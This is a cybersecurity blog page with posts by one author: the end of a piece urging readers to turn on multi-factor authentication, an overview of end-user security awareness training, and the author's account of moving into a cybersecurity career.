Similar to “something you know”, this human authentication attribute is an old practice that involves an individual and a whole lot of trust. An example of this would be utilizing the Chain of Trust model, requiring people to vouching for one another. Here’s a study if you would like to read more about this authentication factor: https://people.csail.mit.edu/rivest/BrainardJuelsRivestSzydloYung-FourthFactorAuthenticationSomebodyYouKnow.pdf
After going through this, you might think that implementing MFA is intimidating but in reality, it’s the total opposite. Most companies already have them implemented on their platform. All that is needed is your approval. Next time you log in to any of your accounts, check the privacy and security settings to see if they have MFA included, which can come in the form of using an Authenticator app (recommended), SMS text message, voice call, or e-mail verification. If you noticed that one of your accounts does not use MFA, consider suggesting it to that platform’s customer support or connect with the IT team of your organization. As end-users, we have a big responsibility when it comes to protecting ourselves online. Starting off with multi-factor authentication is a big step in preventing compromised accounts. Let’s keep security on top of everyone’s minds.
If you’re not sure how to use a multi-factor authentication app, check out this video by Microsoft:
Set up multi-factor authentication with a mobile device in Microsoft 365 Business
Most Authenticator apps work similarly so make sure you use one that works for you. Thank you for reading!
Additional sources:
AUG 3, 2022
End-user Security Awareness Overview
by Eula Chua
August 3, 2022The online space has no bounds. We are all connected in some way. From our smart TVs and Wi-Fi-enabled home appliances to computers and mobile devices. we are surrounded by technology everywhere we go and probably didn’t think we would get as far as becoming dependent on it. Yet, we hear about data security breaches happening all over the world and to all types of organizations, and sometimes we don’t realize how close we are to being a part of one. All it takes is one account to open the gates – to getting compromised.
Unfortunately, we ourselves have become the primary attack vector for threat actors, as mentioned in the SANS 2022 Security Awareness Report (https://www.sans.org/blog/sans-2022-security-awareness-report/). These companies and vendors can only do so much until they’re left with no choice. How can we improve from here? Security Awareness.
To specify, we will be focusing on information security and end-users in particular. We’ll do a quick overview.
According to Infosec Institute (https://resources.infosecinstitute.com/topic/security-awareness-definition-history-types/), “Security Awareness is a formal process for training and educating employees about IT protection.” Because most of us these days are working online, whether it’s for work, education, or personal purposes, security awareness is no longer limited to employees but to everyone.
What are some of the topics security awareness covers?
Topics may include, but are not limited to:
- Email usage
- Social engineering/Phishing
- Online Safety
- Privacy
- Proper password hygiene
- Common errors and how we can prevent it
- Mobile Device usage
- Encryption
- Social Networking
- AUP (Acceptable Use Policies)
Who does it involve or affect?
It involves all end-users, which may include:
- Executives
- Employees
- Students/Educators
- Grandparents/Parents
- Teenagers/Children
- You
Overall, it would be any target that a threat actor chooses to attack.
Where is security awareness needed/Where can it be found?
It is needed everywhere and anywhere we have Internet access. Nowadays, we’re seeing educational facilities bring up online end-user awareness campaigns, especially with the rise of hybrid learning. Most commonly, businesses and large organizations implement security awareness as formal training. Considering how much damage one small mistake can do, it can either do little harm or completely negatively affect the business, whether it’s financially related or business closure. Because budget may be limited, small businesses that need training often are not able to implement it. This is now being made aware, and thankfully, online resources are made available to small businesses to help them get started. Here’s an article by Infosec Institute (https://resources.infosecinstitute.com/topic/security-awareness-training-can-protect-small-businesses/). For end-users in general, most well-known vendors and service providers offer free online security awareness training programs. Amazon offers a free cybersecurity awareness training course that anyone can take on their learning website: https://learnsecurity.amazon.com/.
When would security awareness training take place?
In terms of organizations, If it was possible, it should be an ongoing program however, there may be factors that hinder it from being constant such as time, budget, and resources. Most businesses opt for monthly, bi-monthly, quarterly, or bi-annually employee training depending on the factors previously mentioned. Others may do it annually but that may be a stretch.
How can we prevent ourselves from being attacked?
The key to prevention is being aware. Creating awareness of what type of cyber attacks have been committed allows an individual or an entity to be prepared for what may possibly occur. Then we can move on to taking action.
A few actionable topics to start with, that can be included and taught during security awareness training are:
- Setting up MFA (multi-factor authentication)
- Importance of password managers
- Strong password requirements (i.e. include uppercase, lowercase, numbers, and symbols)
- Wi-Fi and VPN usage
- Tips on identifying phishing emails
- Keeping workstations and devices updated and patch
- Online privacy
Why is security awareness important?
Since the start of the pandemic in 2020, there has been a surge of employees working from home or hybrid. Even many of the websites we visit nowadays require our information, for example, e-commerce, email lists, social media, and more. Because of this, so much of our personal identifiable information (PII) is being made available online in some way. With more network or website traffic happening online, users are more vulnerable to encountering an attack and sometimes might not even know it. There can be many tools implemented to prevent attacks to a certain extent. Raising awareness on common cybersecurity threats and risks can help users protect themselves and their assets, reduce anxiety, become less vulnerable, and be more prepared.
As mentioned earlier in this post, the online space has no bounds. Remember that behind every technology is a human behind it.
Security starts with you.
Resources to help you get started:
JUL 20, 2022
It Takes A Lot Of Courage
by Eula Chua
July 20, 2022My name is Eula. As a Cybersecurity Content Creator for Cybersecurity Central, I wanted to provide you with a glimpse of how I made it here.
It takes a lot of courage for someone to make a career switch or let alone, begin an entirely new career. If you’re one of these people, thank you for being a great example to those around you, for showing that where we are is not the “end-all-be-all” and that there is more for us out there.
A few years ago, I was transitioning out of a career in the Beauty industry not exactly thinking about what was next for me but rather to “go with the flow”. A friend offered me to take on an interview in tech retail and got the job. It was something I would leverage until I make my next move. I thought of pursuing careers in the environmental, medical, behavioral, and educational routes but every time, something would prevent me from continuing. One day, I sat in my Communications class (in a Medical program I was in at the time) and heard my professor say this to the entire class, “You’re in this program because you love it. You’re passionate about it. You want to be here.” Everything she was saying did not translate to how I was feeling. In fact, it was the opposite. I stuck to my commitment, finished Level 1 of that program, and left it. It was difficult to leave but it was freeing.
During my discernment, I remembered someone telling me to reflect on my childhood and recall everything that sparked a light in me. A few of those moments were playing video games with my friends, hosting group chats, researching new technology, learning basic web development to create websites, creating backgrounds and video editing using Adobe tools. All of that had to do with being on the computer. Everything else clicked to me – working on the computer, being surrounded by devices at work, seeing how much of our world has shifted into the digital age. Having a strong Community Outreach background with a desire to help people, being introduced to this side of tech by one of my good friends, and amongst other factors that aligned, I found myself on the path of Cybersecurity. It took a while to get here but I’m here and we’re just getting started.
I hope that our content brings value to you, whether it be something you implement personally or professionally or something you can relate to or learn from. If you have suggestions on topics you would like us to cover, feel free to send me a message on LinkedIn: https://linkedin.com/in/eulac-lipro
SUPPORT OUR MISSION